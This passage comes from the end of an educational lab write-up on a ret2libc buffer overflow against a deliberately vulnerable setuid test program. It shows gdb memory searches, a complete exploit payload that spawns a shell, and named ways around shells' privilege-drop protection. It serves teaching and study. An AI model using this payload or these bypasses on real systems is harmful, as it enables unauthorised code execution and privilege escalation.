	0xf7fbe000 0xf7fc0000     0x2000   0x1d7000 /usr/lib32/libc-2.28.so
	0xf7fc0000 0xf7fc1000     0x1000   0x1d9000 /usr/lib32/libc-2.28.so -----> This range 
	0xf7fc1000 0xf7fc4000     0x3000        0x0 
	0xf7fcd000 0xf7fcf000     0x2000        0x0 
	0xf7fcf000 0xf7fd2000     0x3000        0x0 [vvar]
```

The start and end of the range can be used for gdb PEDA extention command `searchmem pattern start end` (e.g. `searchmem /bin/sh 0xf7de6000 0xf7fc1000`). Finally, the `searchmem` will return address of _/bin/sh/_: 

```console
Searching for '/bin/sh' in range: 0xf7de6000 - 0xf7fc1000
Found 1 results, display max 1 items:
libc : 0xf7f64aaa ("/bin/sh") --------------------> wanted address of /bin/sh
```

5. The last step is to construct final payload with all these elements based on the testing payload. 

As the diagram of the malicious payload in the introduction of this section shows, we need to replace the value of OFFSET (already done in step 1), letters "B" and "C" with the addresses of  _system_ and _exit_ functions (step 3) and finally, the "D" replace with the address of _/bin/sh_ (step 4), e.g. `run $(python -c 'print "A"*116 +"\xe0\x49\xe2\xf7"+"\x60\x7a\xe1\xf7"+"\xaa\x4a\xf6\xf7"')`.

The successful attack will return the new shell (the same payload without adjustments can be used in gdb environemnt and outside of it, just without `run` command).
    

```console
./stack $(python -c 'print "A"*116 +"\xe0\x49\xe2\xf7"+"\x60\x7a\xe1\xf7"+"\xaa\x4a\xf6\xf7"')
Input size: 128
$ 
```

### Privileges escalation

As you could notice, **the shell does not upgrade privileges to the root** as expected with the root-owned _setuid_ file. The reason why is another countermeasure implemented in recent versions of _dash_ and _bash_ shells (directly linked to _/bin/sh_ on Debian and Ubuntu systems) which prevents privileges escalation in case of different values of the real and effective User ID. 

The methods to bypass this countermeasure also exist, such as calling **exec family of functions to run /bin/sh**, run it with **parameter “-p” that makes the shell privileged** or using **another shell without these restrictions** such as _/bin/zsh_. 

The privilege escalation is not implemented at this level. 

# Comments

- By default, the program's input is 500B. 
- By default, buffer size of the vulnerable bof() function is 100B (recommended interval is [100,400]) but can be specified differently in Makefile. 
- **Warning:** Attacks are prepared for default values - their change probably causes attack malfunction requiring adjusting of particular parameters of the attack.
- More details about Buffer Overflow attack in Diploma thesis (Chapter 5)

